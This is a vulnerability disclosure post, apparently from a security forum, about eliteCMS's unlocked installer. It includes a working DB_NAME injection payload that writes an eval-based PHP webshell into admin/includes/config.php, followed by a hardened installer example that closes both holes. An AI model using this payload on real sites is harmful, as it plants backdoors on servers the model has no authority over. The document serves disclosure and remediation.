eliteCMS: installer not locked after installation + one-liner webshell write vulnerability

Posted by the original poster (楼主) on 2012-11-18 13:59:27
eliteCMS's installer is not locked after installation completes, so a hacker can re-run the installation simply by visiting the installer URL.

A second vulnerability: the installer can write a one-liner webshell directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated into PHP source text without any escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the POSTed database name is:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor will be written into /admin/includes/config.php.

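The two defects described in the post (no install lock, and untrusted POST values interpolated straight into PHP source) can both be closed in the step-4 handler. The following is an added hardened example, not eliteCMS's code; it assumes the installer lives in an install/ directory, that the config is written to ../admin/includes/config.php, and that a file install/install.lock (a name chosen here) marks a completed installation. Name values are restricted to a conservative character set, every value is emitted through var_export() so it can never close the string literal or the PHP tag, and the lock is only created after a successful write.

```php
<?php
// Added hardened installer step (example, not eliteCMS code).
// Assumed layout: this file is install/index.php, config goes to
// ../admin/includes/config.php, and install/install.lock marks completion.

declare(strict_types=1);

const CONFIG_FILE = __DIR__ . '/../admin/includes/config.php';
const LOCK_FILE   = __DIR__ . '/install.lock';   // assumed lock file name

/**
 * Validate the database parameters from the POST body and return the
 * cleaned values, or throw. Host, database and user names are limited to a
 * conservative character set, so a value such as the post's
 *   "?><?php eval($_POST[c]);?><?php
 * is rejected before anything reaches the filesystem.
 */
function validateDbParams(array $post): array
{
    $rules = [
        'DB_SERVER' => '/\A[A-Za-z0-9.\-]{1,253}(?::\d{1,5})?\z/',
        'DB_NAME'   => '/\A[A-Za-z0-9_]{1,64}\z/',
        'DB_USER'   => '/\A[A-Za-z0-9_.\-]{1,32}\z/',
    ];
    $clean = [];
    foreach ($rules as $key => $re) {
        $value = $post[$key] ?? '';
        if (!is_string($value) || !preg_match($re, $value)) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $clean[$key] = $value;
    }
    // A password may contain any printable character; it is never
    // interpolated into source text, only emitted via var_export() below.
    $pass = $post['DB_PASS'] ?? '';
    if (!is_string($pass) || strlen($pass) > 256 || preg_match('/[\x00-\x1f\x7f]/', $pass)) {
        throw new InvalidArgumentException('Invalid value for DB_PASS');
    }
    $clean['DB_PASS'] = $pass;
    return $clean;
}

/**
 * Render config.php. var_export() produces a correctly escaped
 * single-quoted PHP string literal, so no input can terminate the literal
 * or the <?php block. The generated file has no closing ?> tag.
 */
function renderConfig(array $db): string
{
    $out = "<?php\n// Generated by the installer; do not edit by hand.\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export($db[$key], true));
    }
    return $out;
}

/**
 * Installer step 4: refuse to run once the lock exists, validate input,
 * write the config atomically, then create the lock so the installer
 * cannot be replayed by simply requesting its URL again.
 */
function runStep4(array $post): void
{
    if (file_exists(LOCK_FILE)) {
        http_response_code(403);
        exit('Installation already completed; remove ' . basename(LOCK_FILE) . ' to reinstall.');
    }
    $db = validateDbParams($post);

    // Write to a temporary file and rename it into place so a partially
    // written config.php is never served.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, renderConfig($db), LOCK_EX) === false || !rename($tmp, CONFIG_FILE)) {
        exit('Could not write configuration file.');
    }
    chmod(CONFIG_FILE, 0640);

    // The lock is created last: a failed write must not leave the
    // installer locked with no usable configuration.
    file_put_contents(LOCK_FILE, date('c') . "\n", LOCK_EX);
}

if (PHP_SAPI !== 'cli' && isset($_GET['step']) && $_GET['step'] === '4') {
    runStep4($_POST);
}
```

With the post's sample value submitted as DB_NAME, validateDbParams() throws before any file is touched; even a password containing quotes or `?>` comes out of renderConfig() as an escaped literal such as `define('DB_PASS', 'a\'b?>c');`. Removing the install/ directory after deployment remains the simplest complement to the lock file.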